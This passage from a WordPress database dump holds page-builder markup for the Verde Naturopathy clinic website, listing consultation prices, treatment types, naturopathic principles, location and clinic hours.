button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.png\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"1-01\" align=\"center\" background_color=\"#ccd4c8\" hover_enabled=\"0\" sticky_enabled=\"0\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"1-01 crop\" module_alignment=\"center\" use_icon=\"on\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" hover_enabled=\"0\" border_width_all=\"1px\" sticky_enabled=\"0\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"2-01\" align=\"center\" custom_padding=\"30px||30px||false|false\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"1-01 crop\" module_alignment=\"center\" use_icon=\"on\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb image_last_edited=\"off|tablet\" _builder_version=\"4.9.4\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_blurb][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_blurb title=\"Initial consult (90 min) - $120\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"1-01 crop\" module_alignment=\"center\" use_icon=\"on\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_5\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-7.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-1.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-4.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Stress strategies</span></li>\n<li><span style=\"font-family: Montserrat;\">Exercise and movement</span></li>\n<li><span style=\"font-family: Montserrat;\">Mindfulness </span></li>\n<li><span style=\"font-family: Montserrat;\">Sleep support</span></li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-5.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">Flower essences </span></li>\n</ul>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_image=\"off\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01-crop.png\" title_text=\"1-01 crop\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; font-weight: normal;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-24 22:08:18','2021-05-24 14:08:18','',28,'https://verde.desidrivers.com.au/?p=120',0,'revision','',0),(97,1,'2021-05-24 12:15:20','2021-05-24 04:15:20','','5-01','','inherit','open','closed','','5-01','','','2021-05-24 12:15:20','2021-05-24 04:15:20','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.jpg',0,'attachment','image/jpeg',0),(98,1,'2021-05-24 12:17:28','2021-05-24 04:17:28','','Icon','','inherit','open','closed','','icon','','','2021-05-24 12:17:28','2021-05-24 04:17:28','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.jpg',0,'attachment','image/jpeg',0),(99,1,'2021-05-24 12:39:32','2021-05-24 04:39:32','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||180px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#000000\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\" inline_fonts=\"Montserrat,Playfair Display\"]<h1><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"> Consultations</span></h1>\n<p><span style=\"font-family: Montserrat;\">Verde Naturopathy offers both face-to-face and online Zoom consultations.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Services\" _builder_version=\"4.9.4\"][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Sed porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" icon_color__hover_enabled=\"on|hover\" icon_color__hover=\"#000000\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Vestibulum ante\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Nulla quis\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Sed porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" 